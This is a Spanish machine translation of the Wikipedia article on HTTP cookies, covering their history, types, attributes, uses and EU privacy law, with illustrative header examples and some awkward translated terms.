Cookie HTTP


Página semiprotejada
Escuche este articulo
De Wikipedia, la enciclopedia libre
Saltar a navegación Saltar a búsqueda

Cookies HTTP (también llamados cookies de Internet , cookies de Internet , las cookies del navegador , o simplemente galletas ) son pequeños bloques de datos creados por un servidor web mientras que un usuario está navegando en una página web y se colocan en el ordenador del usuario u otro dispositivo por el usuario navegador web . Las cookies se colocan en el dispositivo que se utiliza para acceder a un sitio web, y se puede colocar más de una cookie en el dispositivo de un usuario durante una sesión.

Las cookies cumplen funciones útiles y, a veces, esenciales en la web . Permiten a los servidores web almacenar información con estado (como elementos agregados en el carrito de compras en una tienda en línea ) en el dispositivo del usuario o rastrear la actividad de navegación del usuario (incluido hacer clic en botones particulares, iniciar sesión o registrar qué páginas se visitaron en el pasado ). También se pueden usar para guardar para uso posterior información que el usuario ingresó previamente en los campos del formulario , como nombres, direcciones, contraseñas y números de tarjetas de pago .

Los servidores web suelen utilizar cookies de autenticación para autenticar que un usuario ha iniciado sesión y con qué cuenta ha iniciado sesión. Sin la cookie, los usuarios tendrían que autenticarse iniciando sesión en cada página que contenga información confidencial a la que deseen acceder. . La seguridad de una cookie de autenticación generalmente depende de la seguridad del sitio web emisor y del navegador web del usuario , y de si los datos de la cookie están encriptados . Las vulnerabilidades de seguridad pueden permitir que un atacante lea los datos de una cookie y los utilice para obtener acceso a los datos del usuario., o se utiliza para obtener acceso (con las credenciales del usuario) al sitio web al que pertenece la cookie (consulte las secuencias de comandos entre sitios y la falsificación de solicitudes entre sitios para ver ejemplos). [1]

Las cookies de seguimiento, y especialmente las cookies de seguimiento de terceros , se utilizan comúnmente como formas de compilar registros a largo plazo de los historiales de navegación de las personas , un problema potencial de privacidad que llevó a los legisladores europeos [2] y estadounidenses a tomar medidas en 2011. [3] [4] La ley europea requiere que todos los sitios web dirigidos a los estados miembros de la Unión Europea obtengan " consentimiento informado " de los usuarios antes de almacenar cookies no esenciales en su dispositivo.

Fondo

Las cookies HTTP comparten su nombre con una delicia horneada popular.

Origen del nombre

El término "cookie" fue acuñado por el programador de navegadores web Lou Montulli . Se deriva del término " cookie mágica ", que es un paquete de datos que un programa recibe y envía sin cambios, utilizado por los programadores de Unix . [5] [6]

Historia

Las cookies mágicas ya se usaban en informática cuando el programador Lou Montulli tuvo la idea de usarlas en comunicaciones web en junio de 1994. [7] En ese momento, era un empleado de Netscape Communications , que estaba desarrollando una aplicación de comercio electrónico para MCI. . Vint Cerf y John Klensin representaron a MCI en discusiones técnicas con Netscape Communications. MCI no quería que sus servidores tuvieran que retener estados de transacciones parciales, lo que los llevó a pedirle a Netscape que encontrara una manera de almacenar ese estado en la computadora de cada usuario. Las cookies proporcionaron una solución al problema de implementar de manera confiable un carrito de compras virtual .[8] [9]

Junto con John Giannandrea, Montulli escribió la especificación inicial de cookies de Netscape el mismo año. La versión 0.9beta de Mosaic Netscape , publicada el 13 de octubre de 1994, [10] [11] admitía cookies. [12] El primer uso de cookies (fuera de los laboratorios) fue verificar si los visitantes del sitio web de Netscape ya habían visitado el sitio. Montulli solicitó una patente para la tecnología de cookies en 1995, y en 1998  se le otorgó el documento US 5774670. El soporte para cookies se integró con Internet Explorer en la versión 2, lanzada en octubre de 1995. [13]

La introducción de cookies no era ampliamente conocida por el público en ese momento. En particular, las cookies se aceptaron de forma predeterminada y no se notificó a los usuarios de su presencia. El público en general se enteró de las cookies después de que el Financial Times publicara un artículo sobre ellas el 12 de febrero de 1996. [14] En el mismo año, las cookies recibieron mucha atención de los medios, especialmente debido a las posibles implicaciones de privacidad. Las cookies se debatieron en dos audiencias de la Comisión Federal de Comercio de los Estados Unidos en 1996 y 1997. [1]

El desarrollo de las especificaciones formales de las cookies ya estaba en curso. En particular, las primeras discusiones sobre una especificación formal comenzaron en abril de 1995 en la lista de correo de www-talk . Se formó un grupo de trabajo especial dentro del Grupo de Trabajo de Ingeniería de Internet (IETF). Brian Behlendorf había propuesto dos propuestas alternativas para introducir el estado en las transacciones HTTP.y David Kristol respectivamente. Pero el grupo, encabezado por el propio Kristol y Lou Montulli, pronto decidió utilizar la especificación de Netscape como punto de partida. En febrero de 1996, el grupo de trabajo identificó las cookies de terceros como una amenaza considerable para la privacidad. La especificación producida por el grupo se publicó finalmente como RFC 2109 en febrero de 1997. Especifica que las cookies de terceros no estaban permitidas en absoluto, o al menos no estaban habilitadas de forma predeterminada.

En este momento, las empresas de publicidad ya utilizaban cookies de terceros. La recomendación sobre cookies de terceros de RFC 2109 no fue seguida por Netscape e Internet Explorer. RFC 2109 fue reemplazado por RFC 2965 en octubre de 2000.

RFC 2965 agregó un Set-Cookie2 campo de encabezado , que informalmente pasó a llamarse "cookies de estilo RFC 2965" en contraposición al Set-Cookiecampo de encabezado original que se llamó "cookies de estilo Netscape". [15] [16] Set-Cookie2 rara vez se utilizó, sin embargo, y quedó obsoleto en RFC 6265 en abril de 2011, que se escribió como una especificación definitiva para las cookies tal como se utilizan en el mundo real. [17] Ningún navegador moderno reconoce el Set-Cookie2campo de encabezado. [18]

Terminología

Cookie de sesión

Una cookie de sesión (también conocida como cookie en memoria , cookie transitoria o cookie no persistente ) existe solo en la memoria temporal mientras el usuario navega por un sitio web. [19] Las cookies de sesión caducan o se eliminan cuando el usuario cierra el navegador web. [20] Las cookies de sesión son identificadas por el navegador por la ausencia de una fecha de vencimiento asignada.

Cookie persistente

Una cookie persistente caduca en una fecha específica o después de un período de tiempo específico. Durante la vida útil de la cookie persistente establecida por su creador, su información se transmitirá al servidor cada vez que el usuario visite el sitio web al que pertenece, o cada vez que el usuario vea un recurso que pertenece a ese sitio web desde otro sitio web (como un anuncio ).

Por esta razón, las cookies persistentes a veces se denominan cookies de seguimiento porque los anunciantes pueden utilizarlas para registrar información sobre los hábitos de navegación web de un usuario durante un período de tiempo prolongado. Sin embargo, también se utilizan por razones "legítimas" (como mantener a los usuarios conectados a sus cuentas en sitios web, para evitar volver a ingresar las credenciales de inicio de sesión en cada visita).

Cookie segura

Una cookie segura solo se puede transmitir a través de una conexión cifrada (es decir, HTTPS ). No se pueden transmitir a través de conexiones no cifradas (es decir, HTTP ). Esto hace que la cookie sea menos propensa a estar expuesta al robo de cookies a través de escuchas. Una cookie se asegura agregando la Securebandera a la cookie.

Cookie de solo HTTP

Las API del lado del cliente, como JavaScript , no pueden acceder a una cookie de solo http . Esta restricción elimina la amenaza de robo de cookies a través de secuencias de comandos entre sitios (XSS). Sin embargo, la cookie sigue siendo vulnerable a los ataques de rastreo entre sitios (XST) y falsificación de solicitudes entre sitios (CSRF). A una cookie se le da esta característica agregando la bandera a la cookie.HttpOnly

Cookie del mismo sitio

En 2016, la versión 51 de Google Chrome introdujo [21] un nuevo tipo de cookie con atributo SameSite. El atributo SameSitepuede tener un valor de Strict, Laxo None. [22] Con atributo SameSite=Strict, los navegadores solo enviarían cookies al dominio de destino que es el mismo que el dominio de origen. Esto mitigaría eficazmente los ataques de falsificación de solicitudes entre sitios (CSRF). [23] Con SameSite=Lax, los navegadores enviarían cookies con solicitudes a un dominio de destino, incluso si es diferente del dominio de origen, pero solo para solicitudes seguras como GET (POST no es seguro) y no cookies de terceros (dentro de iframe). AtributoSameSite=Nonepermitiría cookies de terceros (entre sitios), sin embargo, la mayoría de los navegadores requieren un atributo seguro en las cookies de SameSite = None. [24]

La cookie del mismo sitio se incorpora en un nuevo borrador de RFC para "Cookies: Mecanismo de administración de estado HTTP" para actualizar RFC6265 (si se aprueba).

Chrome, Firefox, Microsoft Edge comenzaron a admitir cookies del mismo sitio. [25] La clave del lanzamiento es el tratamiento de las cookies existentes sin el atributo SameSite definido, Chrome ha estado tratando esas cookies existentes como si SameSite = None, esto mantendría todos los sitios web / aplicaciones funcionando como antes. Google tenía la intención de cambiar ese valor predeterminado a SameSite = Lax en febrero de 2020, [26] el cambio rompería esas aplicaciones / sitios web si se basan en cookies de terceros / entre sitios, pero sin el atributo SameSite definido. Dados los cambios extensos para los desarrolladores web y las circunstancias de COVID-19 , Google revirtió temporalmente el cambio de cookies de SameSite. [27]

Cookie de terceros

Normalmente, el atributo de dominio de una cookie coincidirá con el dominio que se muestra en la barra de direcciones del navegador web. Esto se llama cookie de origen . Una cookie de terceros , sin embargo, pertenece a un dominio diferente del que se muestra en la barra de direcciones. Este tipo de cookie suele aparecer cuando las páginas web presentan contenido de sitios web externos, como anuncios publicitarios . Esto abre la posibilidad de rastrear el historial de navegación del usuario y, a menudo, los anunciantes lo utilizan en un esfuerzo por ofrecer anuncios relevantes a cada usuario.

Como ejemplo, supongamos que visita un usuario www.example.org. Este sitio web contiene un anuncio de ad.foxytracking.comque, cuando se descarga, establece una cookie que pertenece al dominio del anuncio ( ad.foxytracking.com). Luego, el usuario visita otro sitio web, www.foo.comque también contiene un anuncio ad.foxytracking.comy establece una cookie que pertenece a ese dominio ( ad.foxytracking.com). Eventualmente, estas dos cookies se enviarán al anunciante cuando cargue sus anuncios o visite su sitio web. El anunciante puede utilizar estas cookies para crear un historial de navegación del usuario en todos los sitios web que tienen anuncios de este anunciante, mediante el uso del campo de encabezado de referencia HTTP .

En 2014 , algunos sitios web establecían cookies legibles para más de 100 dominios de terceros. [28] En promedio, un solo sitio web establecía 10 cookies, con un número máximo de cookies (propias y de terceros) que superan las 800. [29]

La mayoría de los navegadores web modernos contienen configuraciones de privacidad que pueden bloquear las cookies de terceros, y algunos ahora bloquean todas las cookies de terceros de forma predeterminada; a partir de julio de 2020, dichos navegadores incluyen Apple Safari , [30] Firefox , [31] y Brave . [32] Safari permite que los sitios integrados utilicen la API de acceso al almacenamiento para solicitar permiso para establecer cookies de origen. En mayo de 2020, Google Chrome introdujo nuevas funciones para bloquear las cookies de terceros de forma predeterminada en su modo de incógnito para la navegación privada, lo que hace que el bloqueo sea opcional durante la navegación normal. La misma actualización también agregó una opción para bloquear las cookies de origen. [33]Chrome planea comenzar a bloquear las cookies de terceros de forma predeterminada en 2022. [34]

Supercookie

Una supercookie es una cookie cuyo origen es un dominio de nivel superior (como .com) o un sufijo público (como .co.uk). Las cookies ordinarias, por el contrario, tienen un origen de un nombre de dominio específico, como example.com.

Las supercookies pueden ser un problema de seguridad potencial y, por lo tanto, los navegadores web las bloquean a menudo. Si el navegador lo desbloquea, un atacante que tenga el control de un sitio web malicioso podría configurar una supercookie y potencialmente interrumpir o suplantar las solicitudes de usuarios legítimos a otro sitio web que comparta el mismo dominio de nivel superior o sufijo público que el sitio web malicioso. Por ejemplo, una supercookie con un origen de .com, podría afectar maliciosamente una solicitud realizada a example.com, incluso si la cookie no se originó en example.com. Esto se puede utilizar para falsificar inicios de sesión o cambiar la información del usuario.

La Public Suffix List [35] ayuda a mitigar el riesgo que suponen las supercookies. La lista de sufijos públicos es una iniciativa de varios proveedores que tiene como objetivo proporcionar una lista precisa y actualizada de sufijos de nombres de dominio. Es posible que las versiones anteriores de los navegadores no tengan una lista actualizada y, por lo tanto, serán vulnerables a las supercookies de ciertos dominios.

Otros usos

El término "supercookie" se utiliza a veces para tecnologías de seguimiento que no dependen de cookies HTTP. Dos de estos mecanismos de "supercookie" se encontraron en los sitios web de Microsoft en agosto de 2011: la sincronización de cookies que reavivó las cookies MUID (identificador único de la máquina) y las cookies ETag . [36] Debido a la atención de los medios, Microsoft luego deshabilitó este código. [37] En una publicación de blog de 2021, Mozilla usó el término "supercookie" para referirse al uso de la caché del navegador (ver más abajo) como un medio para rastrear a los usuarios en los sitios. [38]

Galleta zombi

Una cookie zombie son datos y código que un servidor web ha colocado en la computadora de un visitante u otro dispositivo en una ubicación oculta fuera de la ubicación de almacenamiento de cookies dedicada del navegador web del visitante , y que automáticamente recrea una cookie HTTP como una cookie normal después de la cookie original ha sido eliminada. La cookie zombie puede almacenarse en varias ubicaciones, como el objeto compartido Flash Local , el almacenamiento web HTML5 y otras ubicaciones del lado del cliente e incluso del lado del servidor, y cuando se detecta la ausencia de la cookie, [ aclaración necesaria ] se vuelve a crear [ aclaración necesaria ]utilizando los datos almacenados en estas ubicaciones. [39] [40]

Pared de galletas

Aparece un muro de cookies en un sitio web e informa al usuario sobre el uso de cookies del sitio web. No tiene opción de rechazo y no se puede acceder al sitio web sin cookies de seguimiento.

Estructura

Una cookie consta de los siguientes componentes: [41] [42]

  1. Nombre
  2. Valor
  3. Cero o más atributos ( pares nombre / valor ). Los atributos almacenan información como la caducidad de la cookie, el dominio y las marcas (como Securey HttpOnly).

Usos

Gestión de sesiones

Las cookies se introdujeron originalmente para proporcionar a los usuarios una forma de registrar los artículos que desean comprar mientras navegan por un sitio web (un "carrito de compras" virtual). [8] [9] Hoy, sin embargo, el contenido del carrito de compras de un usuario se almacena generalmente en una base de datos en el servidor, en lugar de en una cookie en el cliente. Para realizar un seguimiento de qué usuario está asignado a qué carro de la compra, el servidor envía una cookie al cliente que contiene un identificador de sesión único.(normalmente, una larga cadena de letras y números aleatorios). Debido a que las cookies se envían al servidor con cada solicitud que realiza el cliente, ese identificador de sesión se enviará de vuelta al servidor cada vez que el usuario visite una nueva página en el sitio web, lo que le permite al servidor saber qué carrito de compras mostrar al usuario.

Otro uso popular de las cookies es para iniciar sesión en sitios web. Cuando el usuario visita la página de inicio de sesión de un sitio web, el servidor web normalmente envía al cliente una cookie que contiene un identificador de sesión único. Cuando el usuario inicia sesión con éxito, el servidor recuerda que ese identificador de sesión en particular ha sido autenticado y le otorga acceso al usuario a sus servicios.

Debido a que las cookies de sesión solo contienen un identificador de sesión único, esto hace que la cantidad de información personal que un sitio web puede guardar sobre cada usuario sea prácticamente ilimitada; el sitio web no se limita a las restricciones sobre el tamaño de una cookie. Las cookies de sesión también ayudan a mejorar los tiempos de carga de la página, ya que la cantidad de información en una cookie de sesión es pequeña y requiere poco ancho de banda.

Personalización

Las cookies se pueden utilizar para recordar información sobre el usuario con el fin de mostrar contenido relevante a ese usuario a lo largo del tiempo. Por ejemplo, un servidor web puede enviar una cookie que contiene el nombre de usuario que se utilizó por última vez para iniciar sesión en un sitio web, de modo que se pueda completar automáticamente la próxima vez que el usuario inicie sesión.

Muchos sitios web utilizan cookies para la personalización según las preferencias del usuario. Los usuarios seleccionan sus preferencias ingresándolas en un formulario web y enviando el formulario al servidor. El servidor codifica las preferencias en una cookie y envía la cookie al navegador. De esta forma, cada vez que el usuario accede a una página del sitio web, el servidor puede personalizar la página según las preferencias del usuario. Por ejemplo, el motor de búsqueda de Google alguna vez usó cookies para permitir a los usuarios (incluso a los no registrados) decidir cuántos resultados de búsqueda por página querían ver. Además, DuckDuckGo utiliza cookies para permitir a los usuarios configurar las preferencias de visualización, como los colores de la página web.

Seguimiento

Las cookies de seguimiento se utilizan para rastrear los hábitos de navegación de los usuarios. Esto también puede hacerse en cierta medida mediante el uso de la dirección IP del ordenador que solicita la página o el árbitro de campo del HTTP encabezado de la solicitud, pero las cookies permiten una mayor precisión. Esto se puede demostrar de la siguiente manera:

  1. Si el usuario solicita una página del sitio, pero la solicitud no contiene ninguna cookie, el servidor supone que esta es la primera página visitada por el usuario. Entonces, el servidor crea un identificador único (generalmente una cadena de letras y números aleatorios) y lo envía como una cookie al navegador junto con la página solicitada.
  2. A partir de este momento, el navegador enviará automáticamente la cookie al servidor cada vez que se solicite una nueva página del sitio. El servidor no solo envía la página como de costumbre, sino que también almacena la URL de la página solicitada, la fecha / hora de la solicitud y la cookie en un archivo de registro.

Al analizar este archivo de registro, es posible averiguar qué páginas ha visitado el usuario, en qué secuencia y durante cuánto tiempo.

Las corporaciones explotan los hábitos web de los usuarios mediante el seguimiento de cookies para recopilar información sobre hábitos de compra. El Wall Street Journal descubrió que los cincuenta sitios web más importantes de Estados Unidos instalaron un promedio de sesenta y cuatro piezas de tecnología de rastreo en las computadoras, lo que resultó en un total de 3.180 archivos de rastreo. [43] A continuación, los datos pueden recopilarse y venderse a empresas licitadoras.

Implementación

Una posible interacción entre un navegador web y un servidor web que contiene una página web en la que el servidor envía una cookie al navegador y el navegador la devuelve cuando solicita otra página.

Las cookies son datos arbitrarios, generalmente elegidos y enviados primero por el servidor web, y almacenados en la computadora del cliente por el navegador web. Luego, el navegador los envía de vuelta al servidor con cada solicitud, introduciendo estados (memoria de eventos anteriores) en transacciones HTTP que de otro modo no tendrían estado . Sin cookies, cada recuperación de una página web o componente de una página web sería un evento aislado, en gran parte sin relación con todas las demás visitas de página realizadas por el usuario en el sitio web. Aunque las cookies generalmente las establece el servidor web, el cliente también puede configurarlas mediante un lenguaje de secuencias de comandos como JavaScript (a menos que se establezca la marca de la cookie HttpOnly, en cuyo caso la cookie no se puede modificar mediante lenguajes de secuencias de comandos).

Las especificaciones de cookies [44] [45] requieren que los navegadores cumplan con los siguientes requisitos para admitir cookies:

  • Puede admitir cookies de hasta 4096 bytes de tamaño.
  • Puede admitir al menos 50 cookies por dominio (es decir, por sitio web).
  • Puede admitir al menos 3000 cookies en total.

Configurar una cookie

Las cookies se configuran mediante el Set-Cookie campo de encabezado , enviadas en una respuesta HTTP desde el servidor web. Este campo de encabezado le indica al navegador web que almacene la cookie y la envíe de vuelta en futuras solicitudes al servidor (el navegador ignorará este campo de encabezado si no admite cookies o si ha desactivado las cookies).

Como ejemplo, el navegador envía su primera solicitud HTTP para la página de inicio del www.example.orgsitio web:

OBTENER  /index.html  HTTP / 1.1 Host :  www.example.org ...

El servidor responde con dos Set-Cookiecampos de encabezado:

HTTP / 1.0  200  OK Tipo de contenido :  texto / html Set-Cookie :  theme = light Set-Cookie :  sessionToken = abc123; Caduca = Mié, 09 de junio de 2021 10:18:14 GMT ...

La respuesta HTTP del servidor contiene el contenido de la página de inicio del sitio web. Pero también indica al navegador que establezca dos cookies. La primera, "tema", se considera una cookie de sesión ya que no tiene un atributo Expireso Max-Age. Las cookies de sesión están destinadas a ser eliminadas por el navegador cuando se cierra. El segundo, "sessionToken", se considera una cookie persistente ya que contiene un Expiresatributo que indica al navegador que elimine la cookie en una fecha y hora específicas.

A continuación, el navegador envía otra solicitud para visitar la spec.htmlpágina del sitio web. Esta solicitud contiene un Cookiecampo de encabezado, que contiene las dos cookies que el servidor le indicó al navegador que estableciera:

OBTENGA  /spec.html  HTTP / 1.1 Host :  www.example.org Cookie :  theme = light; sessionToken = abc123 

De esta forma, el servidor sabe que esta solicitud HTTP está relacionada con la anterior. El servidor respondería enviando la página solicitada, posiblemente incluyendo más Set-Cookiecampos de encabezado en la respuesta HTTP para indicar al navegador que agregue nuevas cookies, modifique las existentes o elimine las existentes. Para eliminar una cookie, el servidor debe incluir un Set-Cookiecampo de encabezado con una fecha de vencimiento en el pasado.

El valor de una cookie puede consistir en cualquier imprimible ASCII caracteres ( !a través ~, Unicode \u0021 a través \u007E) excluyendo ,e ;y espacios en blanco . El nombre de una cookie excluye los mismos caracteres, así como =, ya que ese es el delimitador entre el nombre y el valor. El estándar de cookies RFC 2965 es más restrictivo pero los navegadores no lo implementan.

El término "miga de galletas" se utiliza a veces para referirse al par nombre-valor de una cookie. [46]

Las cookies también se pueden configurar mediante lenguajes de secuencias de comandos como JavaScript que se ejecutan dentro del navegador. En JavaScript, el objeto document.cookiese utiliza para este propósito. Por ejemplo, la instrucción document.cookie = "temperature=20"crea una cookie de nombre "temperatura" y valor "20". [47]

Atributos de cookies

Además de un nombre y un valor, las cookies también pueden tener uno o más atributos. Los navegadores no incluyen atributos de cookies en las solicitudes al servidor; solo envían el nombre y el valor de la cookie. Los navegadores utilizan los atributos de las cookies para determinar cuándo eliminar una cookie, bloquear una cookie o enviar una cookie al servidor.

Dominio y ruta

Los atributos Domainy Pathdefinen el alcance de la cookie. Básicamente, le dicen al navegador a qué sitio web pertenece la cookie. Por razones de seguridad, las cookies solo se pueden configurar en el dominio principal del recurso actual y sus subdominios, y no para otro dominio y sus subdominios. Por ejemplo, el sitio web example.orgno puede establecer una cookie que tenga un dominio de foo.comporque esto permitiría que el sitio web example.orgcontrole las cookies del dominio foo.com.

Si el servidor no especifica las cookies Domainy los Pathatributos, se asignan de forma predeterminada al dominio y la ruta del recurso que se solicitó. [48] Sin embargo, en la mayoría de los navegadores existe una diferencia entre un conjunto de cookies foo.comsin dominio y un conjunto de cookies con el foo.comdominio. En el primer caso, la cookie solo se enviará para solicitudes a foo.com, también conocida como cookie de solo host. En el último caso, también se incluyen todos los subdominios (por ejemplo, docs.foo.com). [49] [50] Una excepción notable a esta regla general es Edge antes de Windows 10 RS3 e Internet Explorer antes de IE 11 y Windows 10 RS4 (abril de 2018), que siempre envía cookies a subdominios independientemente de si la cookie se configuró con o sin dominio.[51]

A continuación, se muestra un ejemplo de algunos Set-Cookiecampos de encabezado en la respuesta HTTP de un sitio web después de que un usuario inició sesión. La solicitud HTTP se envió a una página web dentro del docs.foo.comsubdominio:

HTTP / 1.0  200  OK Establecer cookie :  LSID = DQAAAK… Eaem_vYg; Ruta = / cuentas; Caduca = miércoles, 13 de enero de 2021 22:23:01 GMT; Seguro; HttpOnly Set-Cookie :  HSID = AYQEVn… DKrdst; Dominio = .foo.com; Ruta = /; Caduca = miércoles, 13 de enero de 2021 22:23:01 GMT; HttpOnly Set-Cookie :  SSID = Ap4P… GTEq; Dominio = foo.com; Ruta = /; Caduca = miércoles, 13 de enero de 2021 22:23:01 GMT; Seguro; HttpOnly ...

La primera cookie,, LSIDno tiene ningún Domainatributo y tiene un Pathatributo establecido en /accounts. Esto le dice al navegador que use la cookie solo cuando solicite páginas contenidas en docs.foo.com/accounts(el dominio se deriva del dominio de solicitud). Las otras dos cookies, HSIDy SSID, se usarían cuando el navegador solicita cualquier subdominio en .foo.comcualquier ruta (por ejemplo www.foo.com/bar). El punto anterior es opcional en estándares recientes, pero se puede agregar para compatibilidad con implementaciones basadas en RFC 2109. [52]

Caduca y Max-Age

El Expiresatributo define una fecha y hora específicas en las que el navegador debe eliminar la cookie. La fecha y la hora se especifican en el formato Wdy, DD Mon YYYY HH:MM:SS GMT, o en el formato Wdy, DD Mon YY HH:MM:SS GMTpara los valores de YY donde YY es mayor o igual que 0 y menor o igual que 69. [53]

Alternativamente, el Max-Ageatributo se puede utilizar para establecer la caducidad de la cookie como un intervalo de segundos en el futuro, en relación con el momento en que el navegador recibió la cookie. A continuación se muestra un ejemplo de tres Set-Cookiecampos de encabezado que se recibieron de un sitio web después de que un usuario inició sesión:

HTTP / 1.0  200  OK Establecer cookie :  lu = Rg3vHJZnehYLjVg7qi3bZjzg; Caduca = Martes, 15 de enero de 2013 21:47:38 GMT; Ruta = /; Dominio = .example.com; HttpOnly Set-Cookie :  made_write_conn = 1295214458; Ruta = /; Dominio = .example.com Establecer-Cookie :  reg_fb_gate = eliminado; Caduca = Jue, 01 de Enero de 1970 00:00:01 GMT; Ruta = /; Dominio = .example.com; HttpOnly

La primera cookie, luestá configurada para caducar en algún momento del 15 de enero de 2013. Será utilizada por el navegador del cliente hasta ese momento. La segunda cookie, made_write_connno tiene fecha de caducidad, lo que la convierte en una cookie de sesión. Se eliminará después de que el usuario cierre su navegador. La tercera cookie, reg_fb_gatetiene su valor cambiado a "eliminado", con una fecha de caducidad en el pasado. El navegador eliminará esta cookie de inmediato porque su fecha de vencimiento ya pasó. Tenga en cuenta que la cookie solo se eliminará si los atributos de dominio y ruta en el Set-Cookiecampo coinciden con los valores utilizados cuando se creó la cookie.

A partir de 2016, Internet Explorer no admitía Max-Age. [54] [55]

Seguro y HttpOnly

Los atributos Securey HttpOnlyno tienen valores asociados. Más bien, la presencia de solo los nombres de sus atributos indica que sus comportamientos deben habilitarse.

El Secureatributo está destinado a mantener la comunicación de cookies limitada a la transmisión cifrada, lo que indica a los navegadores que utilicen cookies solo a través de conexiones seguras / cifradas . Sin embargo, si un servidor web establece una cookie con un atributo seguro desde una conexión no segura, la cookie aún puede ser interceptada cuando se envía al usuario mediante ataques man-in-the-middle . Por lo tanto, para una máxima seguridad, las cookies con el atributo Seguro solo deben establecerse a través de una conexión segura.

El HttpOnlyatributo indica a los navegadores que no expongan cookies a través de canales que no sean solicitudes HTTP (y HTTPS). Esto significa que no se puede acceder a la cookie a través de lenguajes de secuencias de comandos del lado del cliente (especialmente JavaScript ) y, por lo tanto, no se puede robar fácilmente mediante secuencias de comandos entre sitios (una técnica de ataque generalizada). [56]

Configuración del navegador

La mayoría de los navegadores modernos admiten cookies y permiten al usuario desactivarlas. Las siguientes son opciones comunes: [57]

  • Habilitar o deshabilitar las cookies por completo, para que siempre sean aceptadas o siempre bloqueadas.
  • Para ver y eliminar cookies de forma selectiva mediante un administrador de cookies.
  • Para borrar completamente todos los datos privados, incluidas las cookies.

De forma predeterminada, Internet Explorer permite cookies de terceros solo si van acompañadas de un campo P3P "CP" (Política compacta). [58]

También existen herramientas complementarias para administrar los permisos de las cookies. [59] [60] [61] [62]

Privacidad y cookies de terceros

Las cookies tienen algunas implicaciones importantes para la privacidad y el anonimato de los usuarios de la web. Si bien las cookies se envían solo al servidor que las configura o un servidor en el mismo dominio de Internet, una página web puede contener imágenes u otros componentes almacenados en servidores en otros dominios. Las cookies que se establecen durante la recuperación de estos componentes se denominan cookies de terceros . Los estándares más antiguos para cookies, RFC 2109 y RFC 2965, especifican que los navegadores deben proteger la privacidad del usuario y no permitir el intercambio de cookies entre servidores de forma predeterminada. Sin embargo, el estándar más nuevo, RFC 6265, permite explícitamente a los agentes de usuario implementar cualquier política de cookies de terceros que deseen. La mayoría de los navegadores, como Mozilla Firefox , Internet Explorer , Opera yGoogle Chrome , permite cookies de terceros de forma predeterminada, siempre que el sitio web de terceros tenga publicada la Política de privacidad compacta . Las versiones más nuevas de Safari bloquean las cookies de terceros, y esto también está planeado para Mozilla Firefox (inicialmente planeado para la versión 22 pero pospuesto indefinidamente). [63]

En este ejemplo ficticio, una empresa de publicidad ha colocado banners en dos sitios web. Al alojar las imágenes del banner en sus servidores y utilizar cookies de terceros, la empresa de publicidad puede rastrear la navegación de los usuarios en estos dos sitios.

Las empresas de publicidad utilizan cookies de terceros para rastrear a un usuario en varios sitios. En particular, una empresa de publicidad puede rastrear a un usuario en todas las páginas en las que ha colocado imágenes publicitarias o errores web . El conocimiento de las páginas visitadas por un usuario permite a la empresa de publicidad orientar los anuncios a las presuntas preferencias del usuario.

Los operadores de sitios web que no revelan el uso de cookies de terceros a los consumidores corren el riesgo de dañar la confianza del consumidor si se descubre el uso de cookies. Tener una divulgación clara (como en una política de privacidad ) tiende a eliminar cualquier efecto negativo de dicho descubrimiento de cookies. [64]

La posibilidad de crear un perfil de usuarios es una amenaza para la privacidad, especialmente cuando el seguimiento se realiza en varios dominios utilizando cookies de terceros. Por esta razón, algunos países tienen legislación sobre cookies.

El gobierno de los Estados Unidos estableció reglas estrictas sobre la instalación de cookies en 2000 después de que se reveló que la oficina de políticas de drogas de la Casa Blanca usaba cookies para rastrear a los usuarios de computadoras que ven su publicidad antidrogas en línea. En 2002, el activista de privacidad Daniel Brandt descubrió que la CIA había estado dejando cookies persistentes en las computadoras que habían visitado su sitio web. Cuando se le notificó que estaba violando la política, la CIA declaró que estas cookies no se establecieron intencionalmente y dejó de hacerlo. [65] El 25 de diciembre de 2005, Brandt descubrió que la Agencia de Seguridad Nacional (NSA) había estado dejando dos cookies persistentes en las computadoras de los visitantes debido a una actualización de software. Después de ser informado, la NSA deshabilitó inmediatamente las cookies.[66]

Directiva de cookies de la UE

En 2002, la Unión Europea lanzó la Directiva sobre privacidad y comunicaciones electrónicas (Directiva de privacidad electrónica), una política que requiere el consentimiento de los usuarios finales para la colocación de cookies y tecnologías similares para almacenar y acceder a información en el equipo de los usuarios. [67] [68]En particular, el artículo 5, párrafo 3, establece que el almacenamiento de datos técnicamente innecesarios en la computadora de un usuario solo se puede realizar si al usuario se le proporciona información sobre cómo se utilizan estos datos y se le da la posibilidad de denegar esta operación de almacenamiento. La Directiva no requiere que los usuarios autoricen o que se les notifique el uso de cookies que se requieren funcionalmente para brindar un servicio que han solicitado, por ejemplo, para conservar la configuración, almacenar sesiones de inicio de sesión o recordar lo que hay en la cesta de la compra de un usuario. [69]

En 2009, la ley fue modificada por la Directiva 2009/136 / EC, que incluyó un cambio en el Artículo 5, Párrafo 3. En lugar de tener una opción para que los usuarios opten por no almacenar cookies, la Directiva revisada requiere que se obtenga el consentimiento para cookies almacenamiento. [68] La definición de consentimiento tiene una referencia cruzada con la definición de la ley europea de protección de datos, en primer lugar la Directiva de protección de datos de 1995 y, posteriormente, el Reglamento general de protección de datos (GDPR). Dado que la definición de consentimiento se reforzó en el texto del RGPD, esto tuvo el efecto de aumentar la calidad del consentimiento requerido por quienes almacenan y acceden a información como las cookies en los dispositivos de los usuarios. Sin embargo, en un caso decidido en virtud de la Directiva de protección de datos, el Tribunal de Justicia de la Unión EuropeaPosteriormente confirmó, sin embargo, que la ley anterior implicaba la misma calidad fuerte de consentimiento que el instrumento actual. [70] Además del requisito de consentimiento que se deriva del almacenamiento o el acceso a información en el dispositivo terminal de un usuario, la información contenida en muchas cookies se considerará datos personales únicamente según el RGPD y requerirá una base legal para su procesamiento. Este ha sido el caso desde la Directiva de protección de datos de 1995, que utilizó una definición idéntica de datos personales, aunque el RGPD en el considerando interpretativo 30 aclara que se incluyen los identificadores de cookies. Si bien no todo el procesamiento de datos bajo el GDPR requiere consentimiento, las características de la publicidad conductual hacen que sea difícil o imposible de justificar bajo cualquier otro motivo. [71] [72]

